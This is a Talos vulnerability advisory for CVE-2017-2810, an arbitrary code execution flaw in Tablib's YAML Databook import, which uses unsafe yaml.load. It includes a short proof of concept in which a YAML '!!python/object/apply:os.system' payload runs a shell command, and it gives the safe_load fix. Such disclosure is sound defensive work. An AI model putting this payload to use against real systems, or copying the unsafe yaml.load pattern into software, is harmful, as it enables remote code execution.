Tablib Yaml Load Code Execution Vulnerability

2017-06-13T00:00:00
ID TALOS-2017-0307
Type talos
Reporter Talos Intelligence
Modified 2017-06-13T00:00:00

Description

Talos Vulnerability Report

TALOS-2017-0307

Tablib Yaml Load Code Execution Vulnerability

June 13, 2017
CVE Number

CVE-2017-2810

Summary

An exploitable vulnerability exists in the Databook loading functionality of Tablib. A yaml loaded Databook can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability.

Tested Versions

Tablib v0.11.4

Product URLs

<https://pypi.python.org/pypi/tablib>

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Details

Tablib is a Python dataset library used to agnostically generate various tabular formats from data. Tablib is also the main driver behind django-import-export application and library.

tablib/formats/_yaml.py:31
def import_book(dbook, in_stream):
    """Returns databook from YAML stream."""

    dbook.wipe()

    for sheet in yaml.load(in_stream): [0]
        data = tablib.Dataset()
        data.title = sheet['title']
        data.dict = sheet['data']
        dbook.add_sheet(data)

Tablib is leveraging the unsafe API yaml.load [0] for importing the current yaml stream into to Databook.. This yaml can contain a python directive to execute arbitrary commands.

Exploit Proof-of-Concept

A test leveraging the Tablib API shows the commands being executed:

(tablib) user in ~
In [1]: import tablib

In [2]: databook = tablib.Databook()

In [3]: databook.load('yaml', '!!python/object/apply:os.system ["ls"]')
AUTHORS         HISTORY.rst     MANIFEST.in     NOTICE          build           docs            tablib          test_tablib.py
HACKING         LICENSE         Makefile        README.rst      dist            setup.py        tablib.egg-info tox.ini

Mitigation

Replace yaml.load with yaml.safe_load

Timeline

2017-04-18 - Vendor Disclosure
2017-06-13 - Public Release

Credit

Discovered by Cory Duplantis of Cisco Talos.


Vulnerability Reports Next Report

TALOS-2016-0245

Previous Report

TALOS-2016-0242